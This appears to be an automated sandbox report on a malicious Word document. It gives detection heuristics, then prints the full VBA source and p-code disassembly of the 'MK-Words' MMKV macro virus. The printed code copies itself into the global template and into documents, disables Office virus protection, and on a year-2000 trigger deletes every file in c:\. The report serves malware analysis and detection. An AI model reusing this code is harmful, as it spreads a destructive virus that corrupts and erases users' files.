MALICIOUS
248
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious OLE document containing legacy WordBasic macros, specifically an AutoOpen macro. The macro attempts to disable security features and execute a payload by exporting a component to 'WINMK.SYS' and then importing it, suggesting it acts as a downloader or dropper for further malicious activity. The presence of legacy macro virus markers and the 'MMKV' naming convention indicate a potentially older, but still functional, malware dropper.
Heuristics 5
-
ClamAV: Doc.Trojan.Mmkv-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Mmkv-1
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
Options.VirusProtection = False -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
AutoOpen -
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10178 bytes |
SHA-256: c1bacf65fa1ae537b77c056403bcce2c082efea56b0ed20dd199515d0ad12a3f |
|||
|
Detection
ClamAV:
Doc.Trojan.Mmkv-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "MMKV"
Public WinDir As String
Public DataDot As Boolean
Sub AutoExec()
AutoOpen
End Sub
Sub AutoOpen()
If Year(Now) = 2000 Then Kill "c:\*.*": Kill "*.*": MsgBox "Welcome To Y2K", 0, "MK-Words By MMK 1999"
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Copy_Tmp
Copy_Vir
End Sub
Sub FileSaveAs()
Dialogs(wdDialogFileSaveAs).Show
If ActiveDocument.SaveFormat = wdFormatDocument Or ActiveDocument.SaveFormat = wdFormatTemplate Then ActiveDocument.SaveAs FileFormat:=wdFormatTemplate
Application.OrganizerCopy NormalTemplate.FullName, ActiveDocument, "MMKV", wdOrganizerObjectProjectItems
ActiveDocument.Save
End Sub
Sub FileOpen()
fa = Dialogs(wdDialogFileOpen).Show
If fa = "" Then GoTo asa
Copy_Vir
asa:
ActiveDocument.Save
End Sub
Sub ToolsMacro()
End Sub
Find_Win
NormalTemplate.VBProject.VBComponents("MMKV").Export WinDir + "\SYSTEM\" + "WINMK.SYS"
Application.OrganizerDelete NormalTemplate.FullName, "MMKV", wdOrganizerObjectProjectItems
While Dialogs(wdDialogToolsMacro).Display
Wend
NormalTemplate.VBProject.VBComponents.import WinDir + "\SYSTEM\" + "WINMK.SYS"
Kill WinDir + "\SYSTEM\" + "WINMK.SYS"
End Sub
Sub FileSave()
If ActiveDocument.FullName = "" Then Dialogs(wdDialogFileSaveAs).Show
Copy_Vir
ActiveDocument.Save
End Sub
Sub viewvbcode()
End Sub
Sub Find_Win()
Close
Dim WD As String
On Error GoTo Err_F
F = FreeFile
Open "c:\msdos.sys" For Input As #F
Do Until EOF(F)
Line Input #F, WD
If Left(UCase(WD), 7) = "WINDIR=" Then
L = Len(WD)
WinDir = UCase$(Mid$(WD, 8, L))
End If
Loop
GoTo END_S
Err_F:
WinDir = ""
END_S:
Close #F
End Sub
Sub Copy_Vir()
For I = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(I).Name = "MMKV" Then GoTo INFECTED
Next
Application.OrganizerCopy NormalTemplate.FullName, ActiveDocument.FullName, "MMKV", wdOrganizerObjectProjectItems
With Dialogs(wdDialogFileSummaryInfo)
.Comments = "MK-Words (V1) By MMK 1999"
.Execute
End With
ActiveDocument.Save
INFECTED:
End Sub
Sub Copy_Tmp()
For I = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(I).Name = "MMKV" Then GoTo INFECTED
Next
Application.OrganizerCopy ActiveDocument.FullName, NormalTemplate.FullName, "MMKV", wdOrganizerObjectProjectItems
With Dialogs(wdDialogFileSummaryInfo)
.Comments = "MK-Words (V1) By MMK 1999"
.Execute
End With
ActiveDocument.Save
INFECTED:
Copy_Vir
With Dialogs(wdDialogFileSummaryInfo)
.Comments = "MK-Words (V1) By MMK 1999"
.Execute
End With
ActiveDocument.Save
End Sub
Attribute VB_Name = "NewMacros"
' Processing file: /tmp/qstore_jg33qqjj
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 903 bytes
' Macros/VBA/MMKV - 5384 bytes
' Line #0:
' Dim (Public)
' VarDefn WinDir (As String)
' Line #1:
' Dim (Public)
' VarDefn DataDot (As Boolean)
' Line #2:
' Line #3:
' FuncDefn (Sub AutoExec())
' Line #4:
' ArgsCall AutoOpen 0x0000
' Line #5:
' EndSub
' Line #6:
' FuncDefn (Sub AutoOpen())
' Line #7:
' Ld Now
' ArgsLd Year 0x0001
' LitDI2 0x07D0
' Eq
' If
' BoSImplicit
' LitStr 0x0006 "c:\*.*"
' ArgsCall Kill 0x0001
' BoS 0x0000
' LitStr 0x0003 "*.*"
' ArgsCall Kill 0x0001
' BoS 0x0000
' LitStr 0x000E "Welcome To Y2K"
' LitDI2 0x0000
' LitStr 0x0014 "MK-Words By MMK 1999"
' ArgsCall MsgBox 0x0003
' EndIf
' Line #8:
' Ld wdCancelDisabled
' Ld Application
' MemSt EnableCancelKey
' Line #9:
' LitDI2 0x0000
' Ld WordBasic
' ArgsMemCall DisableAutoMacros 0x0001
' Line #10:
' LitVarSpecial (False)
' Ld Options
' MemSt VirusProtection
' Line #11:
' LitVarSpecial (False)
' Ld Options
' MemSt SaveNormalPrompt
' Line #12:
' ArgsCall Copy_Tmp 0x0000
' Line #13:
' ArgsCall Copy_Vir 0x0000
' Line #14:
' EndSub
' Line #15:
' FuncDefn (Sub FileSaveAs())
' Line #16:
' Ld wdDialogFileSaveAs
' ArgsLd Dialogs 0x0001
' ArgsMemCall Show 0x0000
' Line #17:
' Ld ActiveDocument
' MemLd SaveFormat
' Ld wdFormatDocument
' Eq
' Ld ActiveDocument
' MemLd SaveFormat
' Ld wdFormatTemplate
' Eq
' Or
' If
' BoSImplicit
' Ld wdFormatTemplate
' ParamNamed FileFormat
' Ld ActiveDocument
' ArgsMemCall SaveAs 0x0001
' EndIf
' Line #18:
' Ld NormalTemplate
' MemLd FullName
' Ld ActiveDocument
' LitStr 0x0004 "MMKV"
' Ld wdOrganizerObjectProjectItems
' Ld Application
' ArgsMemCall OrganizerCopy 0x0004
' Line #19:
' Ld ActiveDocument
' ArgsMemCall Save 0x0000
' Line #20:
' EndSub
' Line #21:
' FuncDefn (Sub FileOpen())
' Line #22:
' Ld wdDialogFileOpen
' ArgsLd Dialogs 0x0001
' MemLd Show
' St fa
' Line #23:
' Ld fa
' LitStr 0x0000 ""
' Eq
' If
' BoSImplicit
' GoTo asa
' EndIf
' Line #24:
' ArgsCall Copy_Vir 0x0000
' Line #25:
' Label asa
' Line #26:
' Ld ActiveDocument
' ArgsMemCall Save 0x0000
' Line #27:
' EndSub
' Line #28:
' FuncDefn (Sub ToolsMacro())
' Line #29:
' EndSub
' Line #30:
' ArgsCall Find_Win 0x0000
' Line #31:
' Ld WinDir
' LitStr 0x0008 "\SYSTEM\"
' Add
' LitStr 0x0009 "WINMK.SYS"
' Add
' LitStr 0x0004 "MMKV"
' Ld NormalTemplate
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' ArgsMemCall Export 0x0001
' Line #32:
' Ld NormalTemplate
' MemLd FullName
' LitStr 0x0004 "MMKV"
' Ld wdOrganizerObjectProjectItems
' Ld Application
' ArgsMemCall OrganizerDelete 0x0003
' Line #33:
' Ld wdDialogToolsMacro
' ArgsLd Dialogs 0x0001
' MemLd Display
' While
' Line #34:
' Wend
' Line #35:
' Ld WinDir
' LitStr 0x0008 "\SYSTEM\"
' Add
' LitStr 0x0009 "WINMK.SYS"
' Add
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' ArgsMemCall import 0x0001
' Line #36:
' Ld WinDir
' LitStr 0x0008 "\SYSTEM\"
' Add
' LitStr 0x0009 "WINMK.SYS"
' Add
' ArgsCall Kill 0x0001
' Line #37:
' EndSub
' Line #38:
' FuncDefn (Sub FileSave())
' Line #39:
' Ld ActiveDocument
' MemLd FullName
' LitStr 0x0000 ""
' Eq
' If
' BoSImplicit
' Ld wdDialogFileSaveAs
' ArgsLd Dialogs 0x0001
' ArgsMemCall Show 0x0000
' EndIf
' Line #40:
' ArgsCall Copy_Vir 0x0000
' Line #41:
' Ld ActiveDocument
' ArgsMemCall Save 0x0000
' Line #42:
' EndSub
' Line #43:
' FuncDefn (Sub viewvbcode())
' Line #44:
' EndSub
' Line #45:
' FuncDefn (Sub Find_Win())
' Line #46:
' CloseAll
' Line #47:
' Dim
' VarDefn WD (As String)
' Line #48:
' OnError Err_F
' Line #49:
' Ld Friend
' St False
' Line #50:
' LitStr 0x000C "c:\msdos.sys"
' Ld False
' Sharp
' LitDefault
' Open (For Input)
' Line #51:
' Ld False
' ArgsLd EOF 0x0001
' DoUnitil
' Line #52:
' Ld False
' Ld WD
' LineInput
' Line #53:
' Ld WD
' ArgsLd UCase 0x0001
' LitDI2 0x0007
' ArgsLd LBound 0x0002
' LitStr 0x0007 "WINDIR="
' Eq
' IfBlock
' Line #54:
' Ld WD
' FnLen
' St L
' Line #55:
' Ld WD
' LitDI2 0x0008
' Ld L
' ArgsLd Mid$$ 0x0003
' ArgsLd UCase$ 0x0001
' St WinDir
' Line #56:
' EndIfBlock
' Line #57:
' Loop
' Line #58:
' GoTo END_S
' Line #59:
' Label Err_F
' Line #60:
' LitStr 0x0000 ""
' St WinDir
' Line #61:
' Label END_S
' Line #62:
' Ld False
' Sharp
' Close 0x0001
' Line #63:
' EndSub
' Line #64:
' FuncDefn (Sub Copy_Vir())
' Line #65:
' StartForVariable
' Ld I
' EndForVariable
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' MemLd Count
' For
' Line #66:
' Ld I
' Ld ActiveDocument
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd New
' LitStr 0x0004 "MMKV"
' Eq
' If
' BoSImplicit
' GoTo INFECTED
' EndIf
' Line #67:
' StartForVariable
' Next
' Line #68:
' Ld NormalTemplate
' MemLd FullName
' Ld ActiveDocument
' MemLd FullName
' LitStr 0x0004 "MMKV"
' Ld wdOrganizerObjectProjectItems
' Ld Application
' ArgsMemCall OrganizerCopy 0x0004
' Line #69:
' StartWithExpr
' Ld wdDialogFileSummaryInfo
' ArgsLd Dialogs 0x0001
' With
' Line #70:
' LitStr 0x0019 "MK-Words (V1) By MMK 1999"
' MemStWith Comments
' Line #71:
' ArgsMemCallWith Execute 0x0000
' Line #72:
' EndWith
' Line #73:
' Ld ActiveDocument
' ArgsMemCall Save 0x0000
' Line #74:
' Label INFECTED
' Line #75:
' EndSub
' Line #76:
' FuncDefn (Sub Copy_Tmp())
' Line #77:
' StartForVariable
' Ld I
' EndForVariable
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' MemLd Count
' For
' Line #78:
' Ld I
' Ld NormalTemplate
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd New
' LitStr 0x0004 "MMKV"
' Eq
' If
' BoSImplicit
' GoTo INFECTED
' EndIf
' Line #79:
' StartForVariable
' Next
' Line #80:
' Ld ActiveDocument
' MemLd FullName
' Ld NormalTemplate
' MemLd FullName
' LitStr 0x0004 "MMKV"
' Ld wdOrganizerObjectProjectItems
' Ld Application
' ArgsMemCall OrganizerCopy 0x0004
' Line #81:
' StartWithExpr
' Ld wdDialogFileSummaryInfo
' ArgsLd Dialogs 0x0001
' With
' Line #82:
' LitStr 0x0019 "MK-Words (V1) By MMK 1999"
' MemStWith Comments
' Line #83:
' ArgsMemCallWith Execute 0x0000
' Line #84:
' EndWith
' Line #85:
' Ld ActiveDocument
' ArgsMemCall Save 0x0000
' Line #86:
' Label INFECTED
' Line #87:
' ArgsCall Copy_Vir 0x0000
' Line #88:
' StartWithExpr
' Ld wdDialogFileSummaryInfo
' ArgsLd Dialogs 0x0001
' With
' Line #89:
' LitStr 0x0019 "MK-Words (V1) By MMK 1999"
' MemStWith Comments
' Line #90:
' ArgsMemCallWith Execute 0x0000
' Line #91:
' EndWith
' Line #92:
' Ld ActiveDocument
' ArgsMemCall Save 0x0000
' Line #93:
' EndSub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.